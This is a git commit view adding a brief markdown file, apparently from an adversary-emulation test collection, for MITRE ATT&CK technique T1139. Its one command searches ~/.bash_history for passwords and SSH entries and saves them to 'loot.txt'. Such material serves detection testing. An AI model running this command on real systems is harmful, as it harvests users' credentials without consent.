Initial Commit
Initial Checkin
This commit is contained in:
@@ -0,0 +1,6 @@
|
||||
# Bash History
|
||||
|
||||
MITRE ATT&CK Technique: [T1139](https://attack.mitre.org/wiki/Technique/T1139)
|
||||
|
||||
|
||||
cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt
|
||||
Reference in New Issue
Block a user